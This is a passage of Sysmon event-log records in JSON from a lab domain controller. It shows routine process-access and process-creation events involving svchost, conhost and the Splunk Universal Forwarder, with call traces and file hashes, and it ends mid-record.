{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1238-5F25-0000-001077330900}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1238-5F25-0000-001077330900}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.277\r\nProcessGuid: {E2A3D6B1-1239-5F25-0000-001033350900}\r\nProcessId: 4768\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.277","ProcessGuid":"{E2A3D6B1-1239-5F25-0000-001033350900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-001033350900}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program 